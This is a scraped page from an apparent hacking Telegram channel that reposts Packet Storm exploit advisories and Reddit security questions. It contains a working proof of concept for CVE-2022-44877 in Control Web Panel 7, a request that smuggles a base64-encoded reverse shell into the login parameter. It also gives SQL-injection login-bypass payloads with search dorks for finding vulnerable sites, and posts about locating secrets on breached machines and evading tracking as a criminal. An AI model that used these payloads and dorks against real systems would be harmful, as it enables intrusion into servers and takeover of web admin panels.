Hacking Articles Tips Tricks Videos Tutorials
469 subscribers
66.2K photos
15 videos
157 files
133K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Control Web Panel 7 Remote Code Execution

https://4.bp.blogspot.com/-slZrAXCcTc4/WWlvSkUdx-I/AAAAAAAAINc/GD9pE2wpupUfP-XcYlxrz5jw2m91dZTOgCLcBGAs/s1600/h39.png
Control Web Panel 7 versions prior to 0.9.8.1147 suffer from an unauthenticated remote code execution vulnerability.

SHA-256 | 698ef6e35dc8ca09f1857de4c6b56f25be500ed741ecd49ee2cd7f5d8dbf30ef

Download
[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.

Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login
--------------

Solution
--------
Upgrade to CWP7 current version.

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Excel Net Computer Institute 4.1 SQL Injection

https://4.bp.blogspot.com/-our8kmhncnY/WWlvTk7Dk6I/AAAAAAAAINs/ofoeVvTLCzkScTt1I86TmBZptlym-DdFACLcBGAs/s1600/h42.png
Excel Net Computer Institute version 4.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

SHA-256 | 6e0d6656b5c808ef3fe50aec1bdf458a6173e6fc9e595d2d4c977a81377adba5

Download
====================================================================================================================================
| # Title : Excel Net Computer Institute Version 4.1 SQL injection authentication bypass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://www.excelnet.org/ |
| # Dork : "photos_view.php?pid=" |
====================================================================================================================================

poc :
[+] Dorking İn Google Or Other Search Enggine.

[+] Use path (/new/) to access at admin panel & Full control of website .

[+] Use payload for login information = user & pass : 1' or 1=1 -- -

[+] https://127.0.0.1/excelnet.41org/new/lead_home.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Linux videobuf2 Use-After-Free

https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
A vb2_mmap race with vb2_core_reqbufs leads to a use-after-free vulnerability in the Linux videobuf2 system.

SHA-256 | d61a2203442211de402e6420b838d2d46c53994de2af84b1f343bfe1d3ad0231

Download
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Eatself 1.1.5 SQL Injection

https://3.bp.blogspot.com/-4JQvP0m8T2k/WWlu48OEwdI/AAAAAAAAII8/Zf-K1JUBYisUlMBEUhCPF3Gl3BdQ2zG_gCLcBGAs/s1600/h103.png
Eatself version 1.1.5 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

SHA-256 | f4fa31a0d3106d8c1adb588bd047ea6ff13bd2f69bed2e503589be0b1ec5678a

Download
====================================================================================================================================
| # Title : Eatself v1.1.5 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://eatself.com/ |
| # Dork : " © Eatself. Tous droits réservés - v1.1.5." |
====================================================================================================================================

poc :
[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : user : 'or''='@gmail.com& Pass : 'or''=' (toltal control of admin panel )

[+] https://127.0.0.1/app.eatself/admin-login
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
cryptmount Filesystem Manager 6.2.0

https://4.bp.blogspot.com/-ILIpsq3JVDo/WWlvQ8IjxbI/AAAAAAAAINI/veR2GTC9zzcP6cUZEvOZqGdUDt2RtL0uQCLcBGAs/s1600/h32.png
cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

SHA-256 | 90cc49fd598d636929c70479b1305f12b011edadf4a54578ace6c0fca8cb5ed2

Download
Source:packetstormsecurity.com
How to continue studying pentesting
https://www.reddit.com/r/Pentesting/comments/107g7tz/how_to_continue_studying_pentesting/

<!-- SC_OFF -->Hi, I have been working towards my pentesting career for a while. However i i bumped into issue. I forget quite a lot of it. I also constantly run into issue where instead of trying out various attack vectors i go and look into writeups. Has anyone had this issue where you struggled at your career path and how did you worked around these problems? <!-- SC_ON --> submitted by /u/AvCan (https://www.reddit.com/user/AvCan)
[link] (https://www.reddit.com/r/Pentesting/comments/107g7tz/how_to_continue_studying_pentesting/) [comments] (https://www.reddit.com/r/Pentesting/comments/107g7tz/how_to_continue_studying_pentesting/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Reconnaissance

If someone gets remote access to a system like a college server, public library, what are the things in the system which may contain sensitive information?

Like:- 1) general/hidden files as people have habit to write their passwords if there are many

2) bash_history

3) browser stored passwords

4) active applications with opened ports

5) may open camera if it has one

submitted by /u/inter_locus789
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Security experts often recommend the use of a burner laptop for increased anonymity, regardless of how hidden your traffic is. What if...

What if a cybercriminal uses a live USB on the home PC (encrypted disk) while running system traffic under multiple proxies and other layered approaches, while also implementing a no file download/upload policy, and blocking interactive browser scripts.

No personal info or metadata shared or used.

Aside the possible mishandling of data passed to proxies, is there any other way the criminal can be tracked?

(Tldr; why is using a burner laptop necessary for total anonymity. Why not use a home pc along with strict security policies and layered approaches?)

submitted by /u/FWitDreDay
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Windows BSOD over WiFi found?

Disclaimer: All below can be consitently re-created on multiple devices

Hey, our school wifi network is so well setup that my PC literally BSOD after like 15 minutes of connecting to it. This is a consistent event, tried it multiple times during the day. I spend the whole lecture on my hotspot and once i connect to the school wifi it takes between 5-10 minutes for my Laptop to just die. I've seen this on other people's computer in my class. I feel like there's someone out there trying to figure out how to trigger a bsod over wifi on purpose and my school is just doing this for free. I don't exactly remember the error codes but it's usually one out of 3. I can recreate it if someone's interested.

What can i do to further investigate? Maybe turn this into a usable exploit? What would be the steps to figure out what exactly is different in the school wifi?

submitted by /u/-Scobra-
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Fundamentals of web security against injection attacks

https://cdn-images-1.medium.com/max/2600/0*O-ujVoPPzXgbV1My
Injection attacks are responsible for some of the most notorious exploitation of web security vulnerabilities. They have led to the most…

Continue reading on Medium »